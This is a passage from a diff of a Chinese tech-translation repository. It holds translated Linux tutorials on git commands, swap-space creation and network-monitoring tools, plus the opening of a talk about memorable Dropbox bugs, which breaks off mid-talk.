#### 与远程仓库连接
|
||||
为了与远程仓库连接,运行如下命令,
|
||||
```
|
||||
$ git remote add origin remote_server
|
||||
```
|
||||
然后检查所有配置的远程服务器,运行如下命令,
|
||||
```
|
||||
$ git remote -v
|
||||
```
|
||||
#### 克隆一个仓库
|
||||
为了从本地服务器克隆一个仓库,运行如下代码,
|
||||
```
|
||||
$ git clone repository_path
|
||||
```
|
||||
如果我们想克隆远程服务器上的一个仓库,那克隆这个仓库的命令是,
|
||||
```
|
||||
$ git clone repository_path
|
||||
```
|
||||
#### 在仓库中列出分支
|
||||
为了检查所有可用的和当前工作的分支列表,执行
|
||||
```
|
||||
$ git branch
|
||||
```
|
||||
#### 创建新分支
|
||||
创建并使用一个新分支,命令是
|
||||
```
|
||||
$ git checkout -b 'branchname'
|
||||
```
|
||||
#### 删除一个分支
|
||||
为了删除一个分支,执行
|
||||
```
|
||||
$ git branch -d 'branchname'
|
||||
```
|
||||
为了删除远程仓库的一个分支,执行
|
||||
```
|
||||
$ git push origin :'branchname'
|
||||
```
|
||||
#### 切换到另一个分支
|
||||
从当前分支切换到另一个分支,使用
|
||||
```
|
||||
$ git checkout 'branchname'
|
||||
```
|
||||
#### 添加文件
|
||||
添加文件到仓库,执行
|
||||
```
|
||||
$ git add filename
|
||||
```
|
||||
#### 文件状态
|
||||
检查文件状态 (那些将要提交或者添加的文件),执行
|
||||
```
|
||||
$ git status
|
||||
```
|
||||
#### 提交变更
|
||||
在我们添加一个文件或者对一个文件作出变更之后,我们通过运行下面命令来提交代码,
|
||||
```
|
||||
$ git commit -a
|
||||
```
|
||||
提交变更到 head 并且不提交到远程仓库,命令是,
|
||||
```
|
||||
$ git commit -m "message"
|
||||
```
|
||||
#### 推送变更
|
||||
推送对该仓库 master 分支所做的变更,运行
|
||||
```
|
||||
$ git push origin master
|
||||
```
|
||||
#### 推送分支到仓库
|
||||
推送对单分支做出的变更到远程仓库,运行
|
||||
```
|
||||
$ git push origin 'branchname'
|
||||
```
|
||||
推送所有分支到远程仓库,运行
|
||||
```
|
||||
$ git push --all origin
|
||||
```
|
||||
#### 合并两个分支
|
||||
合并另一个分支到当前活动分支,使用命令
|
||||
```
|
||||
$ git merge 'branchname'
|
||||
```
|
||||
#### 从远端服务器合并到本地服务器
|
||||
从远端服务器下载/拉取变更到到本地服务器的工作目录,运行
|
||||
```
|
||||
$ git pull
|
||||
```
|
||||
#### 检查合并冲突
|
||||
查看对库文件的合并冲突,运行
|
||||
```
|
||||
$ git diff --base 'filename'
|
||||
```
|
||||
查看所有冲突,运行
|
||||
```
|
||||
$ git diff
|
||||
```
|
||||
如果我们在合并之前想预览所有变更,运行
|
||||
```
|
||||
$ git diff 'source-branch' 'target-branch'
|
||||
```
|
||||
#### 创建标记
|
||||
创建标记来标志任一重要的变更,运行
|
||||
```
|
||||
$ git tag 'tag number' 'commit id'
|
||||
```
|
||||
通过运行以下命令,我们可以查找 commit id
|
||||
```
|
||||
$ git log
|
||||
```
|
||||
#### 推送标记
|
||||
推送所有创建的标记到远端服务器,运行
|
||||
```
|
||||
$ git push --tags origin
|
||||
```
|
||||
#### 恢复做出的变更
|
||||
如果我们想用 head 中最后一次变更来替换对当前工作树的变更,运行
|
||||
```
|
||||
$ git checkout -- 'filename'
|
||||
```
|
||||
我们也可以从远端服务器获取最新的历史,并且将它指向本地仓库的 master 分支,而不是丢弃掉所有本地所做所有变更。为了这么做,运行
|
||||
```
|
||||
$ git fetch origin
|
||||
$ git reset --hard origin/master
|
||||
```
|
||||
好了,伙计们。这些就是我们使用 git 服务器的命令。我们将会很快为大家带来更有趣的教程。如果你希望我们对某个特定话题写一个教程,请通过下面的评论箱告诉我们。像往常一样,您的意见和建议都是受欢迎的。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/beginners-to-pro-guide-for-git-commands/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[liuxinyu123](https://github.com/liuxinyu123)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/install-git-linux-ubuntu-centos/
|
||||
[2]:/cdn-cgi/l/email-protection
|
||||
[3]:http://linuxtechlab.com/scheduling-important-jobs-crontab/
|
||||
[4]:https://www.facebook.com/linuxtechlab/
|
||||
[5]:https://twitter.com/LinuxTechLab
|
||||
[6]:https://plus.google.com/+linuxtechlab
|
||||
[7]:http://linuxtechlab.com/contact-us-2/
|
@ -0,0 +1,117 @@
|
||||
使用 FDISK 和 FALLOCATE 命令创建交换分区
|
||||
======
|
||||
交换分区在物理内存(RAM)被填满时用来保持内存中的内容. 当 RAM 被耗尽, Linux 会将内存中不活动的页移动到交换空间中,从而空出内存给系统使用. 虽然如此, 但交换空间不应被认为是可以用来替代物理内存/RAM的.
|
||||
|
||||
大多数情况下, 建议交换内存的大小为物理内存的1到2倍. 也就是说如果你有8GB内存, 那么交换空间大小应该介于8-16 GB.
|
||||
|
||||
若系统中没有配置交换分区, 当内存耗尽后,系统可能会杀掉正在运行中的进程/应用从而导致系统崩溃. 在本文中, 我们将学会如何为Linux系统添加交换分区,我们有两个办法:
|
||||
|
||||
+ **使用 fdisk 命令**
|
||||
+ **使用 fallocate 命令**
|
||||
|
||||
|
||||
|
||||
### 第一个方法(使用 Fdisk 命令)
|
||||
|
||||
通常, 系统的第一块硬盘会被命名为 **/dev/sda** 而其中的分区会命名为 **/dev/sda1** , **/dev/sda2**. 本文我们使用的是一块有两个主分区的硬盘,两个分区分别为 /dev/sda1, /dev/sda2,而我们使用 /dev/sda3 来做交换分区.
|
||||
|
||||
首先创建一个新分区,
|
||||
|
||||
```
|
||||
$ fdisk /dev/sda
|
||||
```
|
||||
|
||||
按 **' n'** 来创建新分区. 系统会询问你从哪个柱面开始, 直接按回车键使用默认值即可。然后系统询问你到哪个柱面结束, 这里我们输入交换分区的大小(比如1000MB). 这里我们输入 +1000M.
|
||||
|
||||
![swap][2]
|
||||
|
||||
现在我们创建了一个大小为 1000MB 的磁盘了。但是我们并没有设置这个分区的类型, 我们按下 **" t"** 然后回车来设置分区类型.
|
||||
|
||||
现在我们要输入分区编号, 这里我们输入 **3**,然后输入磁盘类型 id,交换分区的磁盘类型为 **82** (要显示所有可用的磁盘类型, 按下 **" l"** ) 然后再按下 " **w "** 保存磁盘分区表.
|
||||
|
||||
![swap][4]
|
||||
|
||||
再下一步使用 `mkswap` 命令来格式化交换分区
|
||||
|
||||
```
|
||||
$ mkswap /dev/sda3
|
||||
```
|
||||
|
||||
然后激活新建的交换分区
|
||||
|
||||
```
|
||||
$ swapon /dev/sda3
|
||||
```
|
||||
|
||||
然而我们的交换分区在重启后并不会自动挂载. 要做到永久挂载,我们需要添加内容到 `/etc/fstab` 文件中. 打开 `/etc/fstab` 文件并输入下面行
|
||||
|
||||
```
|
||||
$ vi /etc/fstab
|
||||
```
|
||||
|
||||
```
|
||||
/dev/sda3 swap swap defaults 0 0
|
||||
```
|
||||
|
||||
保存并关闭文件. 现在每次重启后都能使用我们的交换分区了.
|
||||
|
||||
### 第二种方法(使用 fallocate 命令)
|
||||
|
||||
我推荐用这种方法因为这个是最简单,最快速的创建交换空间的方法了. Fallocate 是最被低估和使用最少的命令之一了. Fallocate 用于为文件预分配块/大小.
|
||||
|
||||
使用 fallocate 创建交换空间, 我们首先在 **'/'** 目录下创建一个名为 **swap_space** 的文件. 然后分配 2GB 到 swap_space 文件,
|
||||
|
||||
```
|
||||
$ fallocate -l 2G /swap_space
|
||||
```
|
||||
|
||||
我们运行下面命令来验证文件大小
|
||||
|
||||
```
|
||||
$ ls -lh /swap_space
|
||||
```
|
||||
|
||||
然后更改文件权限,让 `/swap_space` 更安全
|
||||
|
||||
```
|
||||
$ chmod 600 /swap_space
|
||||
```
|
||||
|
||||
这样只有 root 可以读写该文件了. 我们再来格式化交换分区(译者注:虽然这个swap_space应该是文件,但是我们把它当成是分区来挂载),
|
||||
|
||||
```
|
||||
$ mkswap /swap_space
|
||||
```
|
||||
|
||||
然后启用交换空间
|
||||
|
||||
```
|
||||
$ swapon /swap_space
|
||||
```
|
||||
|
||||
每次重启后都要重新挂载磁盘分区. 因此为了使之持久化,就像上面一样,我们编辑 `/etc/fstab` 并输入下面行
|
||||
|
||||
```
|
||||
/swap_space swap swap sw 0 0
|
||||
```
|
||||
|
||||
保存并退出文件. 现在我们的交换分区会一直被挂载了. 我们重启后可以在终端运行 **free -m** 来检查交换分区是否生效.
|
||||
|
||||
我们的教程至此就结束了, 希望本文足够容易理解和学习. 如果有任何疑问欢迎提出.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/create-swap-using-fdisk-fallocate/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=668%2C211
|
||||
[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk.jpg?resize=668%2C211
|
||||
[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=620%2C157
|
||||
[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk-swap-select.jpg?resize=620%2C157
|
@ -0,0 +1,191 @@
|
||||
三款简单而优秀的Linux网络监视工具
|
||||
============================================================
|
||||
|
||||
![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network")
|
||||
通过iftop,Nethogs和vnstat详细了解你的网络连接状态。[经许可使用][3]
|
||||
|
||||
你可以通过这三个Linux命令了解当前网络的大量信息。iftop通过进程号跟踪网络连接,Nethogs快速告知你哪些进程在占用你的带宽,而vnstat以一个良好的轻量级守护进程在后台运行,并实时记录你的网络使用情况。
|
||||
|
||||
### iftop
|
||||
|
||||
优秀的iftop可以监听您指定的网络接口,并以top的样式呈现。
|
||||
|
||||
这是一个不错的小工具,用于找出网络拥塞,测速和维持网络流量总量。看到自己到底在用多少带宽往往是非常惊人的,尤其是对于我们这些仍然记得电话线路,调制解调器,“高速”到令人惊叫的kb和实时波特率的老人们。我们在很久之前就不再使用波特率,转而钟情于比特率。波特率用于衡量信号变化,尽管有时候与比特率相同,但大多数情况下并非如此。
|
||||
|
||||
如果你只有一个网络接口,直接运行iftop即可。不过iftop需要root权限:
|
||||
|
||||
```
|
||||
$ sudo iftop
|
||||
```
|
||||
|
||||
如果你有多个,那就指定你要监控的接口:
|
||||
|
||||
```
|
||||
$ sudo iftop -i wlan0
|
||||
```
|
||||
|
||||
就像top命令一样,你可以在命令运行时更改显示选项:
|
||||
|
||||
* **h** 切换帮助界面。
|
||||
|
||||
* **n** 是否解析域名。
|
||||
|
||||
* **s** 切换源地址的显示,**d**则切换目的地址的显示。
|
||||
|
||||
* **S** 是否显示端口号。
|
||||
|
||||
* **N** 是否解析端口;若关闭解析则显示端口号。
|
||||
|
||||
* **t**切换文本显示接口。默认的显示方式需要ncurses。我个人认为图1的显示方式在组织性和可读性都更加良好。
|
||||
|
||||
* **p** 暂停显示更新。
|
||||
|
||||
* **q** 退出程序。
|
||||
|
||||
|
||||
![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display")
|
||||
图 1:组织性和可读性良好的文本显示。[经许可使用][1]
|
||||
|
||||
当你切换显示设置的时候,iftop并不会中断监测流量。当然你也可以单独监测一台主机。而这需要主机的IP地址和子网掩码。现在,我很好奇Pandora(译者注:一家美国的电台公司)能给我贫瘠的带宽带来多大的负载。因此我首先使用dig命令找到他们的IP地址:
|
||||
|
||||
```
|
||||
$ dig A pandora.com
|
||||
[...]
|
||||
;; ANSWER SECTION:
|
||||
pandora.com. 267 IN A 208.85.40.20
|
||||
pandora.com. 267 IN A 208.85.40.50
|
||||
```
|
||||
|
||||
那子网掩码呢?[ipcalc][9]会告诉我们:
|
||||
|
||||
```
|
||||
$ ipcalc -b 208.85.40.20
|
||||
Address: 208.85.40.20
|
||||
Netmask: 255.255.255.0 = 24
|
||||
Wildcard: 0.0.0.255
|
||||
=>
|
||||
Network: 208.85.40.0/24
|
||||
```
|
||||
|
||||
现在,将IP地址和子网掩码提供给iftop:
|
||||
|
||||
```
|
||||
$ sudo iftop -F 208.85.40.20/24 -i wlan0
|
||||
```
|
||||
|
||||
很棒的不是么?而我也很惊奇地发现,Pandora在我的网络上,每小时大约使用500kb。并且就像大多数流媒体服务一样,Pandora的流量在迅速增长,并依靠缓存稳定下来。
|
||||
|
||||
|
||||
你可以使用**-G**选项对IPv6地址执行相同的操作。查阅友好的man可以帮助你了解iftop的其他功能,包括使用个人配置文件自定义你的默认选项,以及使用自定义过滤(请参阅 [PCAP-FILTER][10] 来获取过滤指南)。
|
||||
|
||||
### Nethogs
|
||||
|
||||
当你想要快速了解是谁在吸取你的带宽的时候,Nethogs是个快速而简单的方法。你需要以root身份运行并指定要监听的接口。它会给你显示大量的应用程序及其进程号,所以如果你想的话,你可以借此杀死任一进程。
|
||||
|
||||
```
|
||||
$ sudo nethogs wlan0
|
||||
|
||||
NetHogs version 0.8.1
|
||||
|
||||
PID USER PROGRAM DEV SENT RECEIVED
|
||||
7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec
|
||||
5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec
|
||||
TOTAL 12.546 556.618 KB/sec
|
||||
```
|
||||
|
||||
Nethogs并没有多少选项:在kb/s,kb,b,mb之间循环,按接收和发送的数据包排序,调整刷新延迟。具体请看`man nethogs`,或者是运行`nethogs -h`。
|
||||
|
||||
### vnstat
|
||||
|
||||
[vnstat][11]是最容易使用的网络数据收集工具。它十分轻量并且不需要root权限。它以守护进程在后台运行,因此可以实时地记录你的网络数据。单个`vnstat`命令就可以显示所累计的数据。
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0
|
||||
Database updated: Tue Oct 17 08:36:38 2017
|
||||
|
||||
wlan0 since 10/17/2017
|
||||
|
||||
rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB
|
||||
|
||||
monthly
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 85 MiB | 5 MiB | 90 MiB |
|
||||
|
||||
daily
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 125 MiB | 8 MiB | 133 MiB |
|
||||
```
|
||||
|
||||
默认情况下它会显示所有的网络接口。使用`-i`选项来选择某个接口。也可以像这样合并多个接口的数据:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0+eth0+eth1
|
||||
```
|
||||
|
||||
你可以通过这几种方式过滤数据显示:
|
||||
|
||||
* **-h** 按小时显示统计信息。
|
||||
|
||||
* **-d** 按天显示统计信息.
|
||||
|
||||
* **-w**和**-m**分别按周和月份来显示统计信息。
|
||||
|
||||
* 使用**-l**选项查看实时更新。
|
||||
|
||||
以下这条命令将会删除wlan1的数据库并不再监视它:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan1 --delete
|
||||
```
|
||||
|
||||
而这条命令将会为你的一个网络接口创建一个别名。这个例子使用了Ubuntu16.04的一个有线接口名称:
|
||||
|
||||
```
|
||||
$ vnstat -u -i enp0s25 --nick eth0
|
||||
```
|
||||
|
||||
默认情况下,vnstat会监视eth0。你可以在`/etc/vnstat.conf`对它进行修改,或者在你的home目录下创建你自己的个人配置文件。请参阅`man vnstat`以获取完整的指南。
|
||||
|
||||
你也可以安装vnstati来创建简单的彩图(图 2):
|
||||
|
||||
```
|
||||
$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png
|
||||
```
|
||||
|
||||
|
||||
![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati")
|
||||
图 2:你可以使用vnstati来创建简单的彩图。[经许可使用][2]
|
||||
|
||||
请参阅`man vnstati`以获取完整的选项。
|
||||
|
||||
|
||||
_欲了解 Linux 的更多信息,可以通过学习 Linux 基金会和 edX 的免费课程,[“Linux 入门”][7]。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors
|
||||
|
||||
作者:[CARLA SCHRODER ][a]
|
||||
译者:[KeyLD](https://github.com/KeyLD)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/cschroder
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:https://www.linux.com/licenses/category/used-permission
|
||||
[3]:https://www.linux.com/licenses/category/used-permission
|
||||
[4]:https://www.linux.com/files/images/fig-1png-8
|
||||
[5]:https://www.linux.com/files/images/fig-2png-5
|
||||
[6]:https://www.linux.com/files/images/bannerpng-3
|
||||
[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
||||
[8]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc
|
||||
[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html
|
||||
[11]:http://humdi.net/vnstat/
|
303
translated/tech/20171112 Love Your Bugs.md
Normal file
303
translated/tech/20171112 Love Your Bugs.md
Normal file
@ -0,0 +1,303 @@
|
||||
热爱你的 Bug
|
||||
============================================================
|
||||
|
||||
十月初的时候我在贝洛奥里藏特的[<ruby>巴西 Python 大会<rt>Python Brasil</rt></ruby>][1]上做了主题演讲。这是稍加改动过的演讲文稿。你可以在[这里][2]观看演讲视频。
|
||||
|
||||
### 我爱 bug
|
||||
|
||||
我目前是 [Pilot.com][3] 的一位高级工程师,负责给创业公司提供自动记账服务。在此之前,我曾是 [Dropbox][4] 的桌面客户端组的成员,我今天将分享关于我当时工作的一些故事。更早之前,我是 [Recurse Center][5] 的导师,给身在纽约的程序员提供临时的训练环境。在成为工程师之前,我在大学攻读天体物理学并在金融界工作过几年。
|
||||
|
||||
但这些都不重要——关于我你唯一需要知道的是,我爱 bug。我爱 bug 因为它们有趣。它们富有戏剧性。调试一个好的 bug 的过程可以非常迂回曲折。一个好的 bug 像是一个有趣的笑话或者或者谜语——你期望看到某种结果,但却事与愿违。
|
||||
|
||||
在这个演讲中我会给你们讲一些我曾经热爱过的 bug,解释为什么我如此爱 bug,然后说服你们也同样去热爱 bug。
|
||||
|
||||
### Bug 1 号
|
||||
|
||||
好,让我们直接来看第一个 bug。这是我在 Dropbox 工作时遇到的一个 bug。你们或许听说过,Dropbox 是一个将你的文件从一个电脑上同步到云端和其他电脑上的应用。
|
||||
|
||||
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| METASERVER | | BLOCKSERVER |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | |
|
||||
| | +----------+ |
|
||||
| +---> | | |
|
||||
| | CLIENT +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
|
||||
这是个极度简化的 Dropbox 架构图。桌面客户端在你的电脑本地运行,监听文件系统的变动。当它检测到文件改动时,它读取改变的文件,并把它的内容 hash 成 4 MB 大小的文件块。这些文件块被存放在后端一个叫做<ruby>块服务器<rt>blockserver</rt></ruby>的巨大的<ruby>键值对数据库<rt>key-value store</rt></ruby>中。
|
||||
|
||||
当然,我们想避免多次上传同一个文件块。可以想见,如果你在编写一份文档,你应该大部分时候都在改动文档最底部——我们不想一遍又一遍地上传开头部分。所以在上传文件块到块服务器之前,客户端会先和一个负责管理元数据和权限等等的服务器沟通。客户端会询问这个<ruby>元数据服务器<rt>metaserver</rt></ruby>它是需要这个文件块,还是已经见过这个文件块了。元数据服务器会返回每一个文件块是否需要上传。
|
||||
|
||||
所以这些请求和响应看上去大概是这样:客户端说“我有一个改动过的文件,分为这些文件块,它们的 hash 是 `'abcd,deef,efgh'`。服务器响应说“我有前两块,但需要你上传第三块”。然后客户端会把那个文件块上传到块服务器。
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| 元数据服务器 | | 块服务器 |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | '有, 有, 无' |
|
||||
'abcd,deef,efgh' | | +----------+ | efgh: [内容]
|
||||
| +---> | | |
|
||||
| | 客户端 +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
这是问题的背景。下面是 bug。
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
| 块服务器 |
|
||||
| |
|
||||
+-+--+---------+
|
||||
^ |
|
||||
| | '???'
|
||||
'abcdldeef,efgh' | | +----------+
|
||||
^ | +---> | |
|
||||
^ | | 客户端 +
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
有时候客户端会提交一个奇怪的请求:每个 hash 值应该包含 16 个字母,但它却发送了 33 个字母——所需数量的两倍加一。服务器不知道该怎么处理它,于是会抛出一个异常。我们收到这个异常的报告,于是去查看客户端的记录文件,然后会看到非常奇怪的事情——客户端的本地数据库损坏了,或者 python 抛出 MemoryError,没有一个合乎情理的。
|
||||
|
||||
如果你以前没见过这个问题,可能会觉得毫无头绪。但当你见过一次之后,你以后每次看到都能轻松地认出它来。给你一个提示:在那些 33 个字母的字符串中,`l` 经常会代替逗号出现。其他经常出现的字符是:
|
||||
|
||||
```
|
||||
l \x0c < $ ( . -
|
||||
```
|
||||
|
||||
英文逗号的 ASCII 码是44。`l` 的 ASCII 码是 108。它们的二进制表示如下:
|
||||
|
||||
```
|
||||
bin(ord(',')): 0101100
|
||||
bin(ord('l')): 1101100
|
||||
```
|
||||
|
||||
你会注意到 `l` 和逗号只差了一位。问题就出在这里:发生了位反转。桌面客户端使用的内存中的一位发生了错误,于是客户端开始向服务器发送错误的请求。
|
||||
|
||||
这是其他经常代替逗号出现的字符的 ASCII 码:
|
||||
|
||||
```
|
||||
, : 0101100
|
||||
l : 1101100
|
||||
\x0c : 0001100
|
||||
< : 0111100
|
||||
$ : 0100100
|
||||
( : 0101000
|
||||
. : 0101110
|
||||
- : 0101101
|
||||
```
|
||||
|
||||
|
||||
### 位反转是真的!
|
||||
|
||||
我爱这个 bug 因为它证明了位反转是可能真实发生的事情,而不只是一个理论上的问题。实际上,它在某些情况下会比平时更容易发生。其中一种情况是用户使用的是低配或者老旧的硬件,而运行 Dropbox 的电脑很多都是这样。另外一种会造成很多位反转的地方是外太空——在太空中没有大气层来保护你的内存不受高能粒子和辐射的影响,所以位反转会十分常见。
|
||||
|
||||
你大概非常在乎在宇宙中运行的程序的正确性——你的代码或许事关国际空间站中宇航员的性命,但即使没有那么重要,也还要考虑到在宇宙中很难进行软件更新。如果你的确需要让你的程序能够处理位反转,有很多硬件和软件措施可供你选择,Katie Betchold 还关于这个问题做过一个[非常有意思的讲座][6]。
|
||||
|
||||
在刚才那种情况下,Dropbox 并不需要处理位反转。出现内存损坏的是用户的电脑,所以即使我们可以检测到逗号字符的位反转,但如果这发生在其他字符上我们就不一定能检测到了,而且如果从硬盘中读取的文件本身发生了位反转,那我们根本无从得知。我们能改进的地方很少,于是我们决定无视这个异常并继续程序的运行。这种 bug 一般都会在客户端重启之后自动解决。
|
||||
|
||||
### 不常见的 bug 并非不可能发生
|
||||
|
||||
这是我最喜欢的 bug 之一,有几个原因。第一,它提醒我注意不常见和不可能之间的区别。当规模足够大的时候,不常见的现象会以值得注意的频率发生。
|
||||
|
||||
### 覆盖面广的 bug
|
||||
|
||||
这个 bug 第二个让我喜欢的地方是它覆盖面非常广。每当桌面客户端和服务器交流的时候,这个 bug 都可能悄然出现,而这可能会发生在系统里很多不同的端点和组件当中。这意味着许多不同的 Dropbox 工程师会看到这个 bug 的各种版本。你第一次看到它的时候,你 _真的_ 会满头雾水,但在那之后诊断这个 bug 就变得很容易了,而调查过程也非常简短:你只需找到中间的字母,看它是不是个 `l`。
|
||||
|
||||
### 文化差异
|
||||
|
||||
这个 bug 的一个有趣的副作用是它展示了服务器组和客户端组之间的文化差异。有时候这个 bug 会被服务器组的成员发现并展开调查。如果你的 _服务器_ 上发生了位反转,那应该不是个偶然——这很可能是内存损坏,你需要找到受影响的主机并尽快把它从集群中移除,不然就会有损坏大量用户数据的风险。这是个事故,而你必须迅速做出反应。但如果是用户的电脑在破坏数据,你并没有什么可以做的。
|
||||
|
||||
### 分享你的 bug
|
||||
|
||||
如果你在调试一个难搞的 bug,特别是在大型系统中,不要忘记跟别人讨论。也许你的同事以前就遇到过类似的 bug。若是如此,你可能会节省很多时间。就算他们没有见过,也不要忘记在你解决了问题之后告诉他们解决方法——写下来或者在组会中分享。这样下次你们组遇到类似的问题时,你们都会早有准备。
|
||||
|
||||
### Bug 如何帮助你进步
|
||||
|
||||
### Recurse Center
|
||||
|
||||
在加入 Dropbox 之前,我曾在 Recurse Center 工作。它的理念是建立一个社区让正在自学的程序员们聚到一起来提高能力。这就是 Recurse Center 的全部了:我们没有大纲、作业、截止日期等等。唯一的前提条件是我们都想要成为更好的程序员。参与者中有的人有计算机学位但对自己的实际编程能力不够自信,有的人已经写了十年 Java 但想学 Clojure 或者 Haskell,还有各式各样有着其他的背景的参与者。
|
||||
|
||||
我在那里是一位导师,帮助人们更好地利用这个自由的环境,并参考我们从以前的参与者那里学到的东西来提供指导。所以我的同事们和我本人都非常热衷于寻找对成年自学者最有帮助的学习方法。
|
||||
|
||||
### 刻意练习
|
||||
|
||||
在学习方法这个领域有很多不同的研究,其中我觉得最有意思的研究之一是刻意练习的概念。刻意练习理论意在解释专业人士和业余爱好者的表现的差距。它的基本思想是如果你只看内在的特征——不论先天与否——它们都无法非常好地解释这种差距。于是研究者们,包括最初的 Ericsson、Krampe 和 Tesch-Romer,开始寻找能够解释这种差距的理论。他们最终的答案是在刻意练习上所花的时间。
|
||||
|
||||
他们给刻意练习的定义非常精确:不是为了收入而工作,也不是为了乐趣而玩耍。你必须尽自己能力的极限,去做一个和你的水平相称的任务(不能太简单导致你学不到东西,也不能太难导致你无法取得任何进展)。你还需要获得即时的反馈,知道自己是否做得正确。
|
||||
|
||||
这非常令人兴奋,因为这是一套能够用来建立专业技能的系统。但难点在于对于程序员来说这些建议非常难以实施。你很难知道你是否处在自己能力的极限。也很少有即时的反馈帮助你改进——有时候你能得到任何反馈都已经算是很幸运了,还有时候你需要等几个月才能得到反馈。对于在 REPL 中做的简单的事情你可以很快地得到反馈,但如果你在做一个设计上的决定或者技术上的选择,你在很长一段时间里都无法得到反馈。
|
||||
|
||||
但是在有一类编程工作中刻意练习是非常有用的,它就是 debug。如果你写了一份代码,那么当时你是理解这份代码是如何工作的。但你的代码有 bug,所以你的理解并不完全正确。根据定义来说,你正处在你理解能力的极限上——这很好!你马上要学到新东西了。如果你可以重现这个 bug,那么这是个宝贵的机会,你可以获得即时的反馈,知道自己的修改是否正确。
|
||||
|
||||
像这样的 bug 也许能让你学到关于你的程序的一些小知识,但你也可能会学到一些关于运行你的代码的系统的一些更复杂的知识。我接下来要讲一个关于这种 bug 的故事。
|
||||
|
||||
### Bug 2 号
|
||||
|
||||
这也是我在 Dropbox 工作时遇到的 bug。当时我正在调查为什么有些桌面客户端没有像我们预期的那样持续发送日志。我开始调查客户端的日志系统并且发现了很多有意思的 bug。我会挑一些跟这个故事有关的 bug 来讲。
|
||||
|
||||
和之前一样,这是一个非常简化的系统架构。
|
||||
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
+---+ +----------> | 日志服务器 |
|
||||
|日志| | | |
|
||||
+---+ | +------+-------+
|
||||
| |
|
||||
+-----+----+ | 200 ok
|
||||
| | |
|
||||
| 客户端 | <-----------+
|
||||
| |
|
||||
+-----+----+
|
||||
^
|
||||
+--------+--------+--------+
|
||||
| ^ ^ |
|
||||
+--+--+ +--+--+ +--+--+ +--+--+
|
||||
| 日志 | | 日志 | | 日志 | | 日志 |
|
||||
| | | | | | | |
|
||||
| | | | | | | |
|
||||
+-----+ +-----+ +-----+ +-----+
|
||||
```
|
||||
|
||||
桌面客户端会生成日志。这些日志会被压缩、加密并写入硬盘。然后客户端会间歇性地把它们发送给服务器。客户端从硬盘读取日志并发送给日志服务器。服务器会将它解码并存储,然后返回 200。
|
||||
|
||||
如果客户端无法连接到日志服务器,它不会让日志目录无限地增长。超过一定大小之后,它会开始删除日志来让目录大小不超过一个最大值。
|
||||
|
||||
最初的两个 bug 本身并不严重。第一个 bug 是桌面客户端向服务器发送日志时会从最早的日志而不是最新的日志开始。这并不是很好——比如服务器会在客户端报告异常的时候让客户端发送日志,所以你可能最在乎的是刚刚生成的日志而不是在硬盘上的最早的日志。
|
||||
|
||||
